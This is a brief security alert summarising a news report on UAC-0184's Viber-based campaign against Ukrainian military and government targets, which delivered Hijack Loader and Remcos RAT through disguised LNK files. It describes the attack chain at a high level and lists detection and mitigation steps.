Russia-Aligned Hackers Abuse Viber to Target Ukrainian Military and Government

Published:

5 januari 2026 om 17:56:00

Alert date:

5 januari 2026 om 19:02:20

Source:

thehackernews.com

Email & Messaging, Ransomware & Malware, Data Breach & Exfiltration

Russia-aligned threat actor UAC-0184 has been observed targeting Ukrainian military and government entities using the Viber messaging platform to deliver malicious ZIP archives. The campaign represents continued high-intensity intelligence gathering activities against Ukrainian institutions throughout 2025. The attacks leverage social engineering through the popular messaging platform to distribute malware payloads. This activity is part of ongoing cyber operations against Ukraine's critical infrastructure and government systems.

Technical details

The attack chain involves using Viber messaging platform to distribute malicious ZIP archives containing Windows shortcut (LNK) files disguised as Microsoft Word and Excel documents. These LNK files serve as decoys while executing Hijack Loader in the background via PowerShell script that fetches a second ZIP archive (smoothieks.zip) from a remote server. The attack uses DLL side-loading and module stomping techniques for evasion, scans for security software by calculating CRC32 hashes, establishes persistence through scheduled tasks, and injects Remcos RAT into chime.exe process for remote control capabilities.

Mitigation steps:

Monitor for suspicious Viber message attachments containing ZIP archives, scan for LNK files disguised as Office documents, detect PowerShell scripts downloading additional ZIP archives, monitor for DLL side-loading and module stomping techniques, watch for scheduled task creation for persistence, detect Remcos RAT injections into legitimate processes like chime.exe, and implement security controls to detect CRC32 hash calculations targeting security software.

Affected products:

Viber messaging platform
Microsoft Word
Microsoft Excel
Windows systems
PowerShell
chime.exe